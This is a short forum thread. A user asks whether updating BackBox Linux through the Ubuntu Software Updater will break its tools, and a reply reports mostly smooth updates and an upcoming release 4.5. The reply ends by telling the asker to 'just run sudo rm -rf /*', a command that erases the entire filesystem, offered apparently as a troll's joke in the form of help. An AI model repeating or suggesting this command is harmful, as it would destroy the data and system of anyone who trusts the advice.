I remember in an older version of BackBox, allowing the Ubuntu Software Updater to update your system would result in several BackBox tools being broken, and other such issues. With a normal installation of the latest BackBox, is updating through Ubuntu Software Updater going to cause any issues? Is there anything I should be aware of before updating? Should I not update this way?

Hi,

I didn't have issue and I done that twice, but some people did have some small issues. Anyway, BBox 4.5 is on his way because of that.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
